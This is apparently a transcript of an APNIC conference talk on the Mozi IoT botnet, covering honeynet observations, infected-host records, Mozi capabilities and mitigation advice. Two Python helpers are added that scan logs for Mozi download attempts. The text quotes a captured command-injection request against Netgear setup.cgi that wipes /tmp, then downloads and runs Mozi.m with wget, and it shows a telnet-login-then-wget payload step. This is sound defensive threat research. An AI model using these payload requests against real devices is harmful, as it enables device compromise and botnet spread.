APNIC Senior Internet Security Specialist, Adli Wahid, presented on the Mozi botnet, what was observed and how it was mitigated at the 38th TWNIC OPM, held on 1 December 2022 in Taipei.
3. Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Vulnerabilities & Products
5. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright (anutsetsen.e@khanbank.com) for initial work on the research & presentation
4. Background (Source of Data)
• APNIC Community Honeynet Project
o Collaboration with partners across AP
• Honeypots & Honeynet
o Anything that interacts with the honeypots is suspect
o Confirmed with observed actions + artifacts (payload, logs, etc.)
o Definitely not 'spoofed' traffic
• Types of Honeypots
o Telnet/SSH (Cowrie) ** relevant for this talk
o Old vulnerabilities – i.e. SMB (Dionaea)
5. What We Observe
• Attacks that spread via
o SSH & Telnet brute-force
o Exploiting _known_ vulnerabilities
• Nature of
o Malware - cryptominers, DDoS agents, etc.
o Source of attack == infected devices*
• Left of the Hack
o Observations on attacker's infrastructure
o Bot recruitment
o Scripts, malware payload, traffic
• Attacks that no one pays attention to
[Diagram: DDoS attack timeline. "Left of the Hack" = build/buy infrastructure: write malware, infect devices, set up Command & Control. "The Hack" = the attack itself.]
6. Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k nodes)
• Targets IoT devices (MIPS, ARM, PPC and x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a DDoS attack
o Update executable from given URL
o Execute command via shell or system()
o DNS spoofing
o HTTP session hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP-based exploits via the web interface of IoT devices
o Mainly Telnet**, FTP, SSH credential brute-force
7.
Nmap scan report for host-x.static.kbtelecom.net (219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (HTTP on port 53387). Shodan fingerprints the device as a DVR.
9. Mozi author "taken into custody" by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still around?
10. 2022 - Still Active?
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
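An added example (not from the presentation) of the log check the slide recommends: it parses access-log lines in the shape of the excerpt above, URL-decodes the request and reports requests that try to fetch Mozi.a or Mozi.m, together with the host:port the payload is staged on. The sample log lines are constructed with documentation-range IPs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the shape of the slide's log excerpt
# (documentation-range IPs, not real hosts). Line 1 mirrors the Netgear
# setup.cgi command-injection request; line 3 uses %20 instead of '+'.
SAMPLE_LOG = """\
honeypot.example -- 192.0.2.10[10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.0.2.10:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
honeypot.example -- 198.51.100.7[10/Oct/2022:14:25:01 +0900] "GET /index.html HTTP/1.1" 200 512
honeypot.example -- 203.0.113.5[11/Oct/2022:02:10:33 +0900] "GET /cgi-bin/x?cmd=wget%20http://203.0.113.99:41002/mozi.a%20-O%20/tmp/a HTTP/1.0" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<vhost>\S+) -- (?P<src>[^\s\[]+) ?\[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
PAYLOAD_RE = re.compile(
    r'https?://(?P<host>[\d.]+):(?P<port>\d+)/(?P<name>mozi\.[am])\b', re.IGNORECASE
)

def find_mozi_requests(log_text):
    """Return one dict per request that tries to fetch a Mozi.a/Mozi.m payload.

    The request is URL-decoded first so both '+' and '%20' encodings of the
    injected shell command are caught; the match is case-insensitive because
    the slide lists both 'Mozi.m' and 'mozi.m' spellings as candidates.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("req"))
        p = PAYLOAD_RE.search(decoded)
        if not p:
            continue
        hits.append({
            "timestamp": m.group("ts"),
            "source_ip": m.group("src"),
            "payload_host": p.group("host"),
            "payload_port": int(p.group("port")),
            "payload_name": p.group("name"),
            "status": int(m.group("status")),
            # the slide notes the hosting IP may equal the attacking bot or differ
            "self_hosted": p.group("host") == m.group("src"),
        })
    return hits
```

A 301 or 404 status still counts as a hit: the request shows an infected device probing, whether or not the exploit landed.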
11. Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary ".i" in some URLs
o Post-login downloads
• Pattern looks familiar: http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Columns: timestamp, source IP (attacking/spreading), URL on IP hosting binary:random_port, country, ASN
2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
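An added example (not from the presentation) that triages records in the CSV layout shown above: it refangs the hxxp URL, keeps only the "/.i" staging pattern, reports whether each bot served the binary itself or from another host, and counts records per ASN for notification. The records are constructed with documentation-range IPs and private-use ASNs.

```python
import csv
import io
from collections import Counter
from urllib.parse import urlsplit

# Constructed records in the slide's honeynet CSV layout:
# timestamp,source_ip,defanged_url,country,asn (documentation IPs, private ASNs).
SAMPLE_RECORDS = """\
2022-05-25T11:23:24.433026,192.0.2.10,hxxp://192.0.2.10:10035/.i,KR,64496
2022-05-25T17:27:31.588334,198.51.100.7,hxxp://198.51.100.7:56102/.i,CN,64497
2022-05-26T06:51:04.319952,203.0.113.5,hxxp://192.0.2.77:23349/.i,IR,64498
2022-05-26T07:58:51.970983,203.0.113.9,hxxp://198.51.100.200:28681/.i,AU,64499
2022-05-26T09:00:00.000000,192.0.2.30,hxxp://192.0.2.30:80/index.html,KR,64496
"""

def refang(url):
    """Undo the hxxp:// defanging used in the slide's records."""
    return url.replace("hxxp://", "http://", 1).replace("hxxps://", "https://", 1)

def parse_records(text):
    """Parse records and keep only those matching the '/.i' download URL."""
    out = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue
        ts, src, url, cc, asn = row
        u = urlsplit(refang(url))
        if u.path != "/.i" or u.port is None:
            continue  # not the ".i" on a random port staging pattern
        out.append({
            "timestamp": ts, "source_ip": src, "country": cc, "asn": int(asn),
            "payload_host": u.hostname, "payload_port": u.port,
            # same host means the spreading bot also stages the binary
            "self_hosted": u.hostname == src,
        })
    return out

def summarize(records):
    """Count records per ASN and how many bots stage the binary on themselves."""
    by_asn = Counter(r["asn"] for r in records)
    self_hosted = sum(1 for r in records if r["self_hosted"])
    return {"total": len(records), "self_hosted": self_hosted,
            "by_asn": dict(by_asn)}
```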
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.i
12. The ".i" & Finding Mozi
o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
• SHA256: a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config
15. IP from TW – last 6 months
[Snippet]
2022-11-29T00:41:00.077072,60.x.y.205,hxxp://60.x.y.205:61756/.i,TW,3462
2022-11-29T08:49:20.515523,59.x.y.10,hxxp://59.x.y.10:12819/.i,TW,3462
2022-11-29T09:01:48.079099,220.x.y.53,hxxp://220.x.y.53:29971/.i,TW,3462
2022-11-29T17:53:40.465965,49.x.y.24,hxxp://49.x.y.24:45704/.i,TW,18049
2022-11-30T15:48:10.382224,123.x.y.244,hxxp://171.x.y.95:39821/.i,TW,131596
17. Mitigation & Remediation (not just Mozi)
• To prevent
o Spread
o Impact (i.e. DDoS, redirect, mining)
• The usual advice
o Harden device – patch, strong credentials
o But whose job is it anyway?
• Proactive – Monitor, Respond & Share***
o Get feeds on infected devices
o Sources of feeds – Shadowserver Foundation, DASH/APNIC Honeynet, abuse.ch ThreatFox
o Have a response plan
• Threat awareness
o Attackers build infrastructure before attacking
o Don't wait for an attack to happen